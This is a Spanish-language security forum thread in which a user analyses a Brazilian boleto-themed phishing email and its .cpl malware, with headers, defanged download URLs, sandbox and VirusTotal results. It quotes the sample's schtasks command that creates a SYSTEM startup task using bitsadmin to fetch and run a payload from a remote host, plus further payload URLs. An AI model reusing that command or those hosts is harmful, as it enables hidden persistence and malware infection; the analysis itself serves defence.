BoletoSetembro.cpl

Ver el tema anterior Ver el tema siguiente Ir abajo

BoletoSetembro.cpl

Mensaje  r32 el Vie Ago 14, 2015 9:53 pm

Este mensaje lo recibí ayer, me resultó curioso y saqué algo de info, aunque de momento solo estático.
 
Aquí el código del mensaje de hotmail:
Código:
x-store-info:4r51+eLowCe79NzwdU2kRwMf1FfZT+JrOrNqUS7nEGaWI7+e07AEo5CA6K8iX7qtKtPv721BY5mo0WEcsdQP8XzOoWHLaYmOuMSRVnhqmiCChEz1ym6wxKg9LOLCqjdzXXpVvv2L+c8=
Authentication-Results: hotmail.com
; spf=fail (sender IP is 50.116.38.78;
identity alignment result is fail and alignment mode is relaxed)
smtp.mailfrom=www-data@uol.com.br; dkim=none (identity alignment result is
pass and alignment mode is relaxed) header.d=hotmail.com
; x-hmca=none
header.id
 
=mixelyx@hotmail.com X-SID-PRA: mixelyx@hotmail.com X-AUTH-Result:
NONE X-SID-Result: NONE X-Message-Status: n:n X-Message-Delivery:
Vj0xLjE7dXM9MDtsPTA7YT0wO0Q9MjtHRD0yO1NDTD02 X-Message-Info:
11chDOWqoTkwsv9Zisdxe0OuIg2e9Xe3+nPJERnQMhzmYY2w30rOUOVECewZibIxiC+Sp79a25TZ8EgdIr1PuKws638wpvvvqx+tQVRiOWS+BlpxQzg0Pla7ooiSB0teFiOpsoADfWGBa6fUznD7FENT6zo2DX3s5DqTQFcmRvssVEAUj+Dna6uAOBGAvm76Bn7hNIBcWaFtIbo+nQTkYPe0nrJZqeZw
Received: from uol.com.br
([50.116.38.78]) by BAY004-MC5F24.hotmail.com
 
with Microsoft SMTPSVC(7.5.7601.22712); Mon, 1 Sep 2014 21:57:04 -0700
Received: by uol.com.br
(Postfix, from userid 33) id 724011483F; Tue, 2 Sep
2014 04:57:04 +0000 (UTC) To: xxxxxxx@hotmail.com Subject: Segue em
anexo boleto referente ao mes de Setembro X-PHP-Originating-Script:
0:top01.php MIME-Version: 1.0 Content-type: text/html; charset=iso-8859-1
From: Financeiro <mixelyx@hotmail.com> Message-Id: <
20140902045704.724011483F@uol.com.br> Date: Tue, 2 Sep 2014 04:57:04 +0000
(UTC) Return-Path: www-data@uol.com.br X-OriginalArrivalTime: 02 Sep 2014
04:57:04.0984 (UTC) FILETIME=[57427580:01CFC66A] <!DOCTYPE html PUBLIC
"-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <meta
content="text/html; charset=ISO-8859-1" http-equiv="content-type">
<title></title> </head> <body> <a href="
hxtp://bukhamees.com/highslide/graphics/cav.php
 
"><img style="border: 0px
solid ; width: 957px; height: 561px;" src="
hxtp://apmcity.com/css/visixaia.png
 
" alt=""></a> <p><img src="
hxtp://bit.ly/1ox7vYa
" width="1" height="1" /></p> </body> </html>

VT: https://www.virustotal.com/es/file/1784d146c729adc0586b4ee2b21de295987e47824f549b8e3e3d6dc3d6d21a57/analysis/1409643892/

Al hacer click sobre el texto nos descargará este archivo:

hxtp://bukhamees.com/highslide/graphics/cav.php --> hxtp://www.arnetltd.com/BoletoSetembro.zip

Archivo descomprimido: BoletoSetembro.cpl

Info sobre el dominio:
http://whois.domaintools.com/arnetltd.com
Citar
User ID at Hotmail.com:
USER_ID=mixelyx@hotmail.com

De momento el análisis ha sido algo estático, no tengo el otro sistema donde hago las pruebas a punto y de momento esto es lo que aporto.

Aquí teneis el análisis en Anubis:
https://anubis.iseclab.org/?action=result&task_id=1bf98778208944e7461a0d1e8b5f2ad9e&call=first
Traffic.pcap: https://anubis.iseclab.org/?action=result&task_id=1bf98778208944e7461a0d1e8b5f2ad9e&download=traffic.pcap

Un dato curioso en el análisis de AI:
Citar
"C:\WINDOWS\system32\cmd.exe" /c schtasks /CREATE /SC onstart /TN "Adobe Update" /TR "cmd /c ping -n 900 127.0.0.1 &bitsadmin /transfer My /Download /PRIORITY HIGH hxtp://gerenciador.es/a001.jpg %TEMP%\a001.cpl &%TEMP%\a001.cpl" /ru SYSTEM

Echando un ojo al tráfio de datos se observa como desc arga otro archivo desde el siguiente dominio:
hxtp://gerenciador2015.com.br/

Descargará este otro archivo:
hxtp://gerenciador2015.com.br/a001/bitsadmin.exe

VT: https://www.virustotal.com/es/file/f910f378b99f06b5f936e7dc607d5991c39b676f4f2edcaae35a5d4262573968/analysis/1409701400/ --> 0 / 55
Citar
El archivo ya ha sido analizado
Este archivo ya fue analizado por VirusTotal el 2014-08-27 14:37:08 UTC, it was first analysed by VirusTotal on 2008-09-28 16:46:23 UTC.
Detecciones: 0/55
Puede ver el último análisis o reanalizarlo otra vez ahora.

AI: https://anubis.iseclab.org/?action=result&task_id=14a121b02de6fc494d9cb0d297e9fa0d2

Saludos.
avatar
r32
Admin
Admin

Mensajes : 81
Puntos : 1696
Fecha de inscripción : 21/02/2011

https://www.elhacker.net/

Volver arriba Ir abajo

Re: BoletoSetembro.cpl

Mensaje  r32 el Vie Ago 14, 2015 9:53 pm

Envié el archivo "bitsadmin.exe" a Kaspersky Lab para que le echaran un vistazo, no era normal que descargase ese ejecutable.
La respuesta fue que no ven nada raro en el comportamiento de ese ejecutable, pero.....
Si lo descarga es para algo, no? si nos fijamos bien en las funciones que puede llegar a realizar vemos que lo utiliza como túnel, a traves de el, crea un proceso y utiliza las funciones necesarias, veamos que puede hacer.
Si echamos un vistazo a la MSDN vemos todas las funciones que puede llegar a usar:

http://msdn.microsoft.com/en-us/library/aa362813%28v=vs.85%29.aspx

Puede hacer uso de red, listado de archivos, conexión bajo proxy.
Aquí un listado más completo de sus funciones:

http://msdn.microsoft.com/en-us/library/aa362812%28v=vs.85%29.aspx

BITSAdmin Tool segun veo es para win XP, lo podemos descargar en este paquete:

Windows XP Service Pack 2 Support Tools:
Descarga: http://www.microsoft.com/en-us/download/details.aspx?id=18546
D.Directa: http://download.microsoft.com/download/d/3/8/d38066aa-4e37-4ae8-bce3-a4ce662b2024/WindowsXP-KB838079-SupportTools-ENU.exe

Podemos extraerlo con winrar por ejemplo:



Ahora solo tenemos que volver a extraer el contenido del archivo "support.cab" (4.699 KB), aparecerán todos los archivos incluido "bitsadmin.exe".



Vemos que, tanto peso, como hash coinciden, no han tocado para nada ese ejecutable, por eso comentaba lo del puente.
El archivo "BoletoSetembro.cpl" es el que lo controla, aunque aun no he podido probarlo.

Otro archivo que descarga es una dll (Anonymizer.dll), desde aquí:
hxtp://gerenciador2015.com.br/a001/Anonymizer.dll
(SHA256:    6123b093cfdd904db6932e55a3431e70bc0860a2dca4441acd41e699fbc35597)

Otro 0/55:
VT: https://www.virustotal.com/es/file/6123b093cfdd904db6932e55a3431e70bc0860a2dca4441acd41e699fbc35597/analysis/1409937424/

AI: https://anubis.iseclab.org/?action=result&task_id=10be27ac4bb61f4f4d9e7557a9bb888b6

Citar
Processes Created:    
Executable    Command Line
C:\WINDOWS\system32\regsvr32.exe   regsvr32.exe /u /s .\d1.tmp.dll

Realiza muchisimos cambios esta dll.

Saludos.
avatar
r32
Admin
Admin

Mensajes : 81
Puntos : 1696
Fecha de inscripción : 21/02/2011

https://www.elhacker.net/

Volver arriba Ir abajo

Ver el tema anterior Ver el tema siguiente Volver arriba


 
Permisos de este foro:
No puedes responder a temas en este foro.